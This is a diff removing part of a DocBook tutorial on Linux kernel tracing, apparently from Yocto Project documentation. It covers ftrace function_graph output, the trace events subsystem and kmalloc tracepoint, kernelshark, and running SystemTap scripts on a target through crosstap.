- 4) 0.562 us | }
- 4) + 17.452 us | }
- 4) 0.108 us | put_prev_task_fair();
- 4) 0.102 us | pick_next_task_fair();
- 4) 0.084 us | pick_next_task_stop();
- 4) 0.075 us | pick_next_task_rt();
- 4) 0.062 us | pick_next_task_fair();
- 4) 0.066 us | pick_next_task_idle();
- ------------------------------------------
- 4) kworker-74 =&gt; &lt;idle&gt;-0
- ------------------------------------------
-
- 4) | finish_task_switch() {
- 4) | _raw_spin_unlock_irq() {
- 4) 0.100 us | sub_preempt_count();
- 4) 0.582 us | }
- 4) 1.105 us | }
- 4) 0.088 us | sub_preempt_count();
- 4) ! 100.066 us | }
- .
- .
- .
- 3) | sys_ioctl() {
- 3) 0.083 us | fget_light();
- 3) | security_file_ioctl() {
- 3) 0.066 us | cap_file_ioctl();
- 3) 0.562 us | }
- 3) | do_vfs_ioctl() {
- 3) | drm_ioctl() {
- 3) 0.075 us | drm_ut_debug_printk();
- 3) | i915_gem_pwrite_ioctl() {
- 3) | i915_mutex_lock_interruptible() {
- 3) 0.070 us | mutex_lock_interruptible();
- 3) 0.570 us | }
- 3) | drm_gem_object_lookup() {
- 3) | _raw_spin_lock() {
- 3) 0.080 us | add_preempt_count();
- 3) 0.620 us | }
- 3) | _raw_spin_unlock() {
- 3) 0.085 us | sub_preempt_count();
- 3) 0.562 us | }
- 3) 2.149 us | }
- 3) 0.133 us | i915_gem_object_pin();
- 3) | i915_gem_object_set_to_gtt_domain() {
- 3) 0.065 us | i915_gem_object_flush_gpu_write_domain();
- 3) 0.065 us | i915_gem_object_wait_rendering();
- 3) 0.062 us | i915_gem_object_flush_cpu_write_domain();
- 3) 1.612 us | }
- 3) | i915_gem_object_put_fence() {
- 3) 0.097 us | i915_gem_object_flush_fence.constprop.36();
- 3) 0.645 us | }
- 3) 0.070 us | add_preempt_count();
- 3) 0.070 us | sub_preempt_count();
- 3) 0.073 us | i915_gem_object_unpin();
- 3) 0.068 us | mutex_unlock();
- 3) 9.924 us | }
- 3) + 11.236 us | }
- 3) + 11.770 us | }
- 3) + 13.784 us | }
- 3) | sys_ioctl() {
- </literallayout>
- As you can see, the function_graph display is much easier to
- follow. Also note that in addition to the function calls and
- associated braces, other events such as scheduler events
- are displayed in context. In fact, you can freely include
- any tracepoint available in the trace events subsystem described
- in the next section by simply enabling those events, and they'll
- appear in context in the function graph display. Quite a
- powerful tool for understanding kernel dynamics.
- </para>
-
- <para>
- Also notice that there are various annotations on the left
- hand side of the display. For example if the total time it
- took for a given function to execute is above a certain
- threshold, an exclamation point or plus sign appears on the
- left hand side. Please see the ftrace documentation for
- details on all these fields.
- </para>
- </section>
-
- <section id='the-trace-events-subsystem'>
- <title>The 'trace events' Subsystem</title>
-
- <para>
- One especially important directory contained within
- the /sys/kernel/debug/tracing directory is the 'events'
- subdirectory, which contains representations of every
- tracepoint in the system. Listing out the contents of
- the 'events' subdirectory, we see mainly another set of
- subdirectories:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# cd events
- root@sugarbay:/sys/kernel/debug/tracing/events# ls -al
- drwxr-xr-x 38 root root 0 Nov 14 23:19 .
- drwxr-xr-x 5 root root 0 Nov 14 23:19 ..
- drwxr-xr-x 19 root root 0 Nov 14 23:19 block
- drwxr-xr-x 32 root root 0 Nov 14 23:19 btrfs
- drwxr-xr-x 5 root root 0 Nov 14 23:19 drm
- -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
- drwxr-xr-x 40 root root 0 Nov 14 23:19 ext3
- drwxr-xr-x 79 root root 0 Nov 14 23:19 ext4
- drwxr-xr-x 14 root root 0 Nov 14 23:19 ftrace
- drwxr-xr-x 8 root root 0 Nov 14 23:19 hda
- -r--r--r-- 1 root root 0 Nov 14 23:19 header_event
- -r--r--r-- 1 root root 0 Nov 14 23:19 header_page
- drwxr-xr-x 25 root root 0 Nov 14 23:19 i915
- drwxr-xr-x 7 root root 0 Nov 14 23:19 irq
- drwxr-xr-x 12 root root 0 Nov 14 23:19 jbd
- drwxr-xr-x 14 root root 0 Nov 14 23:19 jbd2
- drwxr-xr-x 14 root root 0 Nov 14 23:19 kmem
- drwxr-xr-x 7 root root 0 Nov 14 23:19 module
- drwxr-xr-x 3 root root 0 Nov 14 23:19 napi
- drwxr-xr-x 6 root root 0 Nov 14 23:19 net
- drwxr-xr-x 3 root root 0 Nov 14 23:19 oom
- drwxr-xr-x 12 root root 0 Nov 14 23:19 power
- drwxr-xr-x 3 root root 0 Nov 14 23:19 printk
- drwxr-xr-x 8 root root 0 Nov 14 23:19 random
- drwxr-xr-x 4 root root 0 Nov 14 23:19 raw_syscalls
- drwxr-xr-x 3 root root 0 Nov 14 23:19 rcu
- drwxr-xr-x 6 root root 0 Nov 14 23:19 rpm
- drwxr-xr-x 20 root root 0 Nov 14 23:19 sched
- drwxr-xr-x 7 root root 0 Nov 14 23:19 scsi
- drwxr-xr-x 4 root root 0 Nov 14 23:19 signal
- drwxr-xr-x 5 root root 0 Nov 14 23:19 skb
- drwxr-xr-x 4 root root 0 Nov 14 23:19 sock
- drwxr-xr-x 10 root root 0 Nov 14 23:19 sunrpc
- drwxr-xr-x 538 root root 0 Nov 14 23:19 syscalls
- drwxr-xr-x 4 root root 0 Nov 14 23:19 task
- drwxr-xr-x 14 root root 0 Nov 14 23:19 timer
- drwxr-xr-x 3 root root 0 Nov 14 23:19 udp
- drwxr-xr-x 21 root root 0 Nov 14 23:19 vmscan
- drwxr-xr-x 3 root root 0 Nov 14 23:19 vsyscall
- drwxr-xr-x 6 root root 0 Nov 14 23:19 workqueue
- drwxr-xr-x 26 root root 0 Nov 14 23:19 writeback
- </literallayout>
- Each one of these subdirectories corresponds to a
- 'subsystem' and contains yet again more subdirectories,
- each one of those finally corresponding to a tracepoint.
- For example, here are the contents of the 'kmem' subsystem:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing/events# cd kmem
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem# ls -al
- drwxr-xr-x 14 root root 0 Nov 14 23:19 .
- drwxr-xr-x 38 root root 0 Nov 14 23:19 ..
- -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
- -rw-r--r-- 1 root root 0 Nov 14 23:19 filter
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kfree
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kmalloc
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kmalloc_node
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_alloc
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_alloc_node
- drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_free
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc_extfrag
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc_zone_locked
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_free
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_free_batched
- drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_pcpu_drain
- </literallayout>
- Let's see what's inside the subdirectory for a specific
- tracepoint, in this case the one for kmalloc:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem# cd kmalloc
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# ls -al
- drwxr-xr-x 2 root root 0 Nov 14 23:19 .
- drwxr-xr-x 14 root root 0 Nov 14 23:19 ..
- -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
- -rw-r--r-- 1 root root 0 Nov 14 23:19 filter
- -r--r--r-- 1 root root 0 Nov 14 23:19 format
- -r--r--r-- 1 root root 0 Nov 14 23:19 id
- </literallayout>
- The 'format' file for the tracepoint describes the event
- in memory, which is used by the various tracing tools
- that now make use of these tracepoint to parse the event
- and make sense of it, along with a 'print fmt' field that
- allows tools like ftrace to display the event as text.
- Here's what the format of the kmalloc event looks like:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# cat format
- name: kmalloc
- ID: 313
- format:
- field:unsigned short common_type; offset:0; size:2; signed:0;
- field:unsigned char common_flags; offset:2; size:1; signed:0;
- field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
- field:int common_pid; offset:4; size:4; signed:1;
- field:int common_padding; offset:8; size:4; signed:1;
-
- field:unsigned long call_site; offset:16; size:8; signed:0;
- field:const void * ptr; offset:24; size:8; signed:0;
- field:size_t bytes_req; offset:32; size:8; signed:0;
- field:size_t bytes_alloc; offset:40; size:8; signed:0;
- field:gfp_t gfp_flags; offset:48; size:4; signed:0;
-
- print fmt: "call_site=%lx ptr=%p bytes_req=%zu bytes_alloc=%zu gfp_flags=%s", REC->call_site, REC->ptr, REC->bytes_req, REC->bytes_alloc,
- (REC->gfp_flags) ? __print_flags(REC->gfp_flags, "|", {(unsigned long)(((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
- gfp_t)0x20000u) | (( gfp_t)0x02u) | (( gfp_t)0x08u)) | (( gfp_t)0x4000u) | (( gfp_t)0x10000u) | (( gfp_t)0x1000u) | (( gfp_t)0x200u) | ((
- gfp_t)0x400000u)), "GFP_TRANSHUGE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x20000u) | ((
- gfp_t)0x02u) | (( gfp_t)0x08u)), "GFP_HIGHUSER_MOVABLE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
- gfp_t)0x20000u) | (( gfp_t)0x02u)), "GFP_HIGHUSER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
- gfp_t)0x20000u)), "GFP_USER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x80000u)), GFP_TEMPORARY"},
- {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u)), "GFP_KERNEL"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u)),
- "GFP_NOFS"}, {(unsigned long)((( gfp_t)0x20u)), "GFP_ATOMIC"}, {(unsigned long)((( gfp_t)0x10u)), "GFP_NOIO"}, {(unsigned long)((
- gfp_t)0x20u), "GFP_HIGH"}, {(unsigned long)(( gfp_t)0x10u), "GFP_WAIT"}, {(unsigned long)(( gfp_t)0x40u), "GFP_IO"}, {(unsigned long)((
- gfp_t)0x100u), "GFP_COLD"}, {(unsigned long)(( gfp_t)0x200u), "GFP_NOWARN"}, {(unsigned long)(( gfp_t)0x400u), "GFP_REPEAT"}, {(unsigned
- long)(( gfp_t)0x800u), "GFP_NOFAIL"}, {(unsigned long)(( gfp_t)0x1000u), "GFP_NORETRY"}, {(unsigned long)(( gfp_t)0x4000u), "GFP_COMP"},
- {(unsigned long)(( gfp_t)0x8000u), "GFP_ZERO"}, {(unsigned long)(( gfp_t)0x10000u), "GFP_NOMEMALLOC"}, {(unsigned long)(( gfp_t)0x20000u),
- "GFP_HARDWALL"}, {(unsigned long)(( gfp_t)0x40000u), "GFP_THISNODE"}, {(unsigned long)(( gfp_t)0x80000u), "GFP_RECLAIMABLE"}, {(unsigned
- long)(( gfp_t)0x08u), "GFP_MOVABLE"}, {(unsigned long)(( gfp_t)0), "GFP_NOTRACK"}, {(unsigned long)(( gfp_t)0x400000u), "GFP_NO_KSWAPD"},
- {(unsigned long)(( gfp_t)0x800000u), "GFP_OTHER_NODE"} ) : "GFP_NOWAIT"
- </literallayout>
- The 'enable' file in the tracepoint directory is what allows
- the user (or tools such as trace-cmd) to actually turn the
- tracepoint on and off. When enabled, the corresponding
- tracepoint will start appearing in the ftrace 'trace'
- file described previously. For example, this turns on the
- kmalloc tracepoint:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 1 > enable
- </literallayout>
- At the moment, we're not interested in the function tracer or
- some other tracer that might be in effect, so we first turn
- it off, but if we do that, we still need to turn tracing on in
- order to see the events in the output buffer:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# echo nop > current_tracer
- root@sugarbay:/sys/kernel/debug/tracing# echo 1 > tracing_on
- </literallayout>
- Now, if we look at the the 'trace' file, we see nothing
- but the kmalloc events we just turned on:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
- # tracer: nop
- #
- # entries-in-buffer/entries-written: 1897/1897 #P:8
- #
- # _-----=&gt; irqs-off
- # / _----=&gt; need-resched
- # | / _---=&gt; hardirq/softirq
- # || / _--=&gt; preempt-depth
- # ||| / delay
- # TASK-PID CPU# |||| TIMESTAMP FUNCTION
- # | | | |||| | |
- dropbear-1465 [000] ...1 18154.620753: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18154.621640: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- &lt;idle&gt;-0 [000] ..s3 18154.621656: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- matchbox-termin-1361 [001] ...1 18154.755472: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f0e00 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
- Xorg-1264 [002] ...1 18154.755581: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
- Xorg-1264 [002] ...1 18154.755583: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
- Xorg-1264 [002] ...1 18154.755589: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
- matchbox-termin-1361 [001] ...1 18155.354594: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db35400 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
- Xorg-1264 [002] ...1 18155.354703: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
- Xorg-1264 [002] ...1 18155.354705: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
- Xorg-1264 [002] ...1 18155.354711: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
- &lt;idle&gt;-0 [000] ..s3 18155.673319: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- dropbear-1465 [000] ...1 18155.673525: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18155.674821: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- &lt;idle&gt;-0 [000] ..s3 18155.793014: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- dropbear-1465 [000] ...1 18155.793219: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18155.794147: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- &lt;idle&gt;-0 [000] ..s3 18155.936705: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- dropbear-1465 [000] ...1 18155.936910: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18155.937869: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- matchbox-termin-1361 [001] ...1 18155.953667: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f2000 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
- Xorg-1264 [002] ...1 18155.953775: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
- Xorg-1264 [002] ...1 18155.953777: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
- Xorg-1264 [002] ...1 18155.953783: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
- &lt;idle&gt;-0 [000] ..s3 18156.176053: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- dropbear-1465 [000] ...1 18156.176257: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18156.177717: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- &lt;idle&gt;-0 [000] ..s3 18156.399229: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- dropbear-1465 [000] ...1 18156.399434: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_http://rostedt.homelinux.com/kernelshark/req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
- &lt;idle&gt;-0 [000] ..s3 18156.400660: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
- matchbox-termin-1361 [001] ...1 18156.552800: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db34800 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
- </literallayout>
- To again disable the kmalloc event, we need to send 0 to the
- enable file:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 0 > enable
- </literallayout>
- You can enable any number of events or complete subsystems
- (by using the 'enable' file in the subsystem directory) and
- get an arbitrarily fine-grained idea of what's going on in the
- system by enabling as many of the appropriate tracepoints
- as applicable.
- </para>
-
- <para>
- A number of the tools described in this HOWTO do just that,
- including trace-cmd and kernelshark in the next section.
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> These tracepoints and their representation
- are used not only by ftrace, but by many of the other tools
- covered in this document and they form a central point of
- integration for the various tracers available in Linux.
- They form a central part of the instrumentation for the
- following tools: perf, lttng, ftrace, blktrace and SystemTap
- </informalexample>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> Eventually all the special-purpose tracers
- currently available in /sys/kernel/debug/tracing will be
- removed and replaced with equivalent tracers based on the
- 'trace events' subsystem.
- </informalexample>
- </section>
-
- <section id='trace-cmd-kernelshark'>
- <title>trace-cmd/kernelshark</title>
-
- <para>
- trace-cmd is essentially an extensive command-line 'wrapper'
- interface that hides the details of all the individual files
- in /sys/kernel/debug/tracing, allowing users to specify
- specific particular events within the
- /sys/kernel/debug/tracing/events/ subdirectory and to collect
- traces and avoid having to deal with those details directly.
- </para>
-
- <para>
- As yet another layer on top of that, kernelshark provides a GUI
- that allows users to start and stop traces and specify sets
- of events using an intuitive interface, and view the
- output as both trace events and as a per-CPU graphical
- display. It directly uses 'trace-cmd' as the plumbing
- that accomplishes all that underneath the covers (and
- actually displays the trace-cmd command it uses, as we'll see).
- </para>
-
- <para>
- To start a trace using kernelshark, first start kernelshark:
- <literallayout class='monospaced'>
- root@sugarbay:~# kernelshark
- </literallayout>
- Then bring up the 'Capture' dialog by choosing from the
- kernelshark menu:
- <literallayout class='monospaced'>
- Capture | Record
- </literallayout>
- That will display the following dialog, which allows you to
- choose one or more events (or even one or more complete
- subsystems) to trace:
- </para>
-
- <para>
- <imagedata fileref="figures/kernelshark-choose-events.png" width="6in" depth="6in" align="center" scalefit="1" />
- </para>
-
- <para>
- Note that these are exactly the same sets of events described
- in the previous trace events subsystem section, and in fact
- is where trace-cmd gets them for kernelshark.
- </para>
-
- <para>
- In the above screenshot, we've decided to explore the
- graphics subsystem a bit and so have chosen to trace all
- the tracepoints contained within the 'i915' and 'drm'
- subsystems.
- </para>
-
- <para>
- After doing that, we can start and stop the trace using
- the 'Run' and 'Stop' button on the lower right corner of
- the dialog (the same button will turn into the 'Stop'
- button after the trace has started):
- </para>
-
- <para>
- <imagedata fileref="figures/kernelshark-output-display.png" width="6in" depth="6in" align="center" scalefit="1" />
- </para>
-
- <para>
- Notice that the right-hand pane shows the exact trace-cmd
- command-line that's used to run the trace, along with the
- results of the trace-cmd run.
- </para>
-
- <para>
- Once the 'Stop' button is pressed, the graphical view magically
- fills up with a colorful per-cpu display of the trace data,
- along with the detailed event listing below that:
- </para>
-
- <para>
- <imagedata fileref="figures/kernelshark-i915-display.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- Here's another example, this time a display resulting
- from tracing 'all events':
- </para>
-
- <para>
- <imagedata fileref="figures/kernelshark-all.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- The tool is pretty self-explanatory, but for more detailed
- information on navigating through the data, see the
- <ulink url='http://rostedt.homelinux.com/kernelshark/'>kernelshark website</ulink>.
- </para>
- </section>
-
- <section id='ftrace-documentation'>
- <title>Documentation</title>
-
- <para>
- The documentation for ftrace can be found in the kernel
- Documentation directory:
- <literallayout class='monospaced'>
- Documentation/trace/ftrace.txt
- </literallayout>
- The documentation for the trace event subsystem can also
- be found in the kernel Documentation directory:
- <literallayout class='monospaced'>
- Documentation/trace/events.txt
- </literallayout>
- There is a nice series of articles on using
- ftrace and trace-cmd at LWN:
- <itemizedlist>
- <listitem><para><ulink url='http://lwn.net/Articles/365835/'>Debugging the kernel using Ftrace - part 1</ulink>
- </para></listitem>
- <listitem><para><ulink url='http://lwn.net/Articles/366796/'>Debugging the kernel using Ftrace - part 2</ulink>
- </para></listitem>
- <listitem><para><ulink url='http://lwn.net/Articles/370423/'>Secrets of the Ftrace function tracer</ulink>
- </para></listitem>
- <listitem><para><ulink url='https://lwn.net/Articles/410200/'>trace-cmd: A front-end for Ftrace</ulink>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- There's more detailed documentation kernelshark usage here:
- <ulink url='http://rostedt.homelinux.com/kernelshark/'>KernelShark</ulink>
- </para>
-
- <para>
- An amusing yet useful README (a tracing mini-HOWTO) can be
- found in /sys/kernel/debug/tracing/README.
- </para>
- </section>
-</section>
-
-<section id='profile-manual-systemtap'>
- <title>systemtap</title>
-
- <para>
- SystemTap is a system-wide script-based tracing and profiling tool.
- </para>
-
- <para>
- SystemTap scripts are C-like programs that are executed in the
- kernel to gather/print/aggregate data extracted from the context
- they end up being invoked under.
- </para>
-
- <para>
- For example, this probe from the
- <ulink url='http://sourceware.org/systemtap/tutorial/'>SystemTap tutorial</ulink>
- simply prints a line every time any process on the system open()s
- a file. For each line, it prints the executable name of the
- program that opened the file, along with its PID, and the name
- of the file it opened (or tried to open), which it extracts
- from the open syscall's argstr.
- <literallayout class='monospaced'>
- probe syscall.open
- {
- printf ("%s(%d) open (%s)\n", execname(), pid(), argstr)
- }
-
- probe timer.ms(4000) # after 4 seconds
- {
- exit ()
- }
- </literallayout>
- Normally, to execute this probe, you'd simply install
- systemtap on the system you want to probe, and directly run
- the probe on that system e.g. assuming the name of the file
- containing the above text is trace_open.stp:
- <literallayout class='monospaced'>
- # stap trace_open.stp
- </literallayout>
- What systemtap does under the covers to run this probe is 1)
- parse and convert the probe to an equivalent 'C' form, 2)
- compile the 'C' form into a kernel module, 3) insert the
- module into the kernel, which arms it, and 4) collect the data
- generated by the probe and display it to the user.
- </para>
-
- <para>
- In order to accomplish steps 1 and 2, the 'stap' program needs
- access to the kernel build system that produced the kernel
- that the probed system is running. In the case of a typical
- embedded system (the 'target'), the kernel build system
- unfortunately isn't typically part of the image running on
- the target. It is normally available on the 'host' system
- that produced the target image however; in such cases,
- steps 1 and 2 are executed on the host system, and steps
- 3 and 4 are executed on the target system, using only the
- systemtap 'runtime'.
- </para>
-
- <para>
- The systemtap support in Yocto assumes that only steps
- 3 and 4 are run on the target; it is possible to do
- everything on the target, but this section assumes only
- the typical embedded use-case.
- </para>
-
- <para>
- So basically what you need to do in order to run a systemtap
- script on the target is to 1) on the host system, compile the
- probe into a kernel module that makes sense to the target, 2)
- copy the module onto the target system and 3) insert the
- module into the target kernel, which arms it, and 4) collect
- the data generated by the probe and display it to the user.
- </para>
-
- <section id='systemtap-setup'>
- <title>Setup</title>
-
- <para>
- Those are a lot of steps and a lot of details, but
- fortunately Yocto includes a script called 'crosstap'
- that will take care of those details, allowing you to
- simply execute a systemtap script on the remote target,
- with arguments if necessary.
- </para>
-
- <para>
- In order to do this from a remote host, however, you
- need to have access to the build for the image you
- booted. The 'crosstap' script provides details on how
- to do this if you run the script on the host without having
- done a build:
- <note>
- SystemTap, which uses 'crosstap', assumes you can establish an
- ssh connection to the remote target.
- Please refer to the crosstap wiki page for details on verifying
- ssh connections at
- <ulink url='https://wiki.yoctoproject.org/wiki/Tracing_and_Profiling#systemtap'></ulink>.
- Also, the ability to ssh into the target system is not enabled
- by default in *-minimal images.
- </note>
- <literallayout class='monospaced'>
- $ crosstap root@192.168.1.88 trace_open.stp
-
- Error: No target kernel build found.
- Did you forget to create a local build of your image?
-
- 'crosstap' requires a local sdk build of the target system
- (or a build that includes 'tools-profile') in order to build
- kernel modules that can probe the target system.
-
- Practically speaking, that means you need to do the following:
- - If you're running a pre-built image, download the release
- and/or BSP tarballs used to build the image.
- - If you're working from git sources, just clone the metadata
- and BSP layers needed to build the image you'll be booting.
- - Make sure you're properly set up to build a new image (see
- the BSP README and/or the widely available basic documentation
- that discusses how to build images).
- - Build an -sdk version of the image e.g.:
- $ bitbake core-image-sato-sdk
- OR
- - Build a non-sdk image but include the profiling tools:
- [ edit local.conf and add 'tools-profile' to the end of
- the EXTRA_IMAGE_FEATURES variable ]
- $ bitbake core-image-sato
-
- Once you've build the image on the host system, you're ready to
- boot it (or the equivalent pre-built image) and use 'crosstap'
- to probe it (you need to source the environment as usual first):
-
- $ source oe-init-build-env
- $ cd ~/my/systemtap/scripts
- $ crosstap root@192.168.1.xxx myscript.stp
- </literallayout>
- So essentially what you need to do is build an SDK image or
- image with 'tools-profile' as detailed in the
- "<link linkend='profile-manual-general-setup'>General Setup</link>"
- section of this manual, and boot the resulting target image.
- </para>
-
- <note>
- If you have a build directory containing multiple machines,
- you need to have the MACHINE you're connecting to selected
- in local.conf, and the kernel in that machine's build
- directory must match the kernel on the booted system exactly,
- or you'll get the above 'crosstap' message when you try to
- invoke a script.
- </note>
- </section>
-
- <section id='running-a-script-on-a-target'>
- <title>Running a Script on a Target</title>
-
- <para>
- Once you've done that, you should be able to run a systemtap
- script on the target:
- <literallayout class='monospaced'>
- $ cd /path/to/yocto
- $ source oe-init-build-env
-
- ### Shell environment set up for builds. ###
-
- You can now run 'bitbake &lt;target&gt;'
-
- Common targets are:
- core-image-minimal
- core-image-sato
- meta-toolchain
- meta-ide-support
-
- You can also run generated qemu images with a command like 'runqemu qemux86-64'
-
- </literallayout>
- Once you've done that, you can cd to whatever directory
- contains your scripts and use 'crosstap' to run the script:
- <literallayout class='monospaced'>
- $ cd /path/to/my/systemap/script
- $ crosstap root@192.168.7.2 trace_open.stp
- </literallayout>
- If you get an error connecting to the target e.g.:
- <literallayout class='monospaced'>
- $ crosstap root@192.168.7.2 trace_open.stp
- error establishing ssh connection on remote 'root@192.168.7.2'
- </literallayout>
- Try ssh'ing to the target and see what happens:
- <literallayout class='monospaced'>
- $ ssh root@192.168.7.2
- </literallayout>
- A lot of the time, connection problems are due specifying a
- wrong IP address or having a 'host key verification error'.
- </para>
-
- <para>
- If everything worked as planned, you should see something
- like this (enter the password when prompted, or press enter
- if it's set up to use no password):
- <literallayout class='monospaced'>
- $ crosstap root@192.168.7.2 trace_open.stp
- root@192.168.7.2's password:
- matchbox-termin(1036) open ("/tmp/vte3FS2LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
- matchbox-termin(1036) open ("/tmp/vteJMC7LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
- </literallayout>
- </para>
- </section>
-
- <section id='systemtap-documentation'>
- <title>Documentation</title>
-
- <para>
- The SystemTap language reference can be found here:
